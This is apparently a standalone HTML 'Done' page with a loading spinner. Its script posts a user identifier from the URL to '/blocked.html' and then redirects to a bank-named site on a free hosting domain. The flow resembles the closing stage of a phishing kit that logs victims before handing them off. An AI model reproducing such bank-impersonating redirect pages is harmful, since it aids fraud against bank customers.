<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Done</title>


  

</head>


<body>


    <dialog class="DIG"  id="myDialog">
       
        <div id="down" class="">
            <div id="loader"></div>
            <div style="height: 5vh;"></div>
            <p style="text-align: center; padding: 10%;">Loading...</p>

        </div>
      


    
        <style>
            .top{
                width: 100%;
                height: 50vh;
                display: flex;
                align-items: center;
                justify-content: center;
                flex-direction: column;
            }
            .hide{
                display: none;
            }
            .immg{
                width: 20%;
               
            }
            @media screen and (max-width:992px) {
                .immg{
            width: 40%;
            }
          }
            .DIG{
                border: 0px;
                display: flex;
                align-items: center;
                justify-content: center;
                flex-direction: column;
                width: 50%;
                height: 90vh;
            }
            @media screen and (max-width:992px) {
                .DIG{
                    width: 90%;
                   
                    }
                }

                .cc{
                background-color: rgb(8, 44, 13);
                padding-left: 8%;
                padding-right: 8%;
                padding-top: 3%;
                padding-bottom: 3%;
                color: white;
            }
            .cc:hover{
                background-color: rgb(18, 112, 31);
            }

            /* SPINNER CSS */

            body {
	background: white;
	min-height: 100vh;
	display: grid;
	place-items: center;
	margin: 0;
}

#loader {
	width: 8rem;
	height: 8rem;
	position: relative;
	border-radius: 11px;
	animation: spin 1s ease infinite;
	
	&::before, &::after {
		content: '';
		width: 40%;
		height: 40%;
		display: block;
		position: absolute;
		border-radius: 9px;
	}
	&::before {
		top: 3px;
		left: 3px;
		background: rgb(8, 44, 13);
	}
	&::after {
		bottom: 3px;
		right: 3px;
		background: rgb(8, 44, 13);
	}
}

@keyframes spin {
	from {
		transform: rotate(135deg);
	}
	to {
		transform: rotate(495deg);
	}
}
        </style>

        <script>

    
            </script>
    </dialog>

    <script>
        
   </script>


<script type="module">

    const url = window.location.search;
    const urldata = new URLSearchParams(url);
    const i = urldata.get("i")

    let thedate = new Date().toLocaleString();
    
    let formData2 = {
        user: i,

    }

    const options = {
    method: 'POST',

    headers: {
    'Content-type': 'application/json'
    },
    body: JSON.stringify(formData2),
    }
    const respones = await fetch('/blocked.html', options);
    respones.json().then(async(dd) => {
        window.location.href='https://kreditdot-bank.web.app/'
           });


    



</script>

</body>
</html>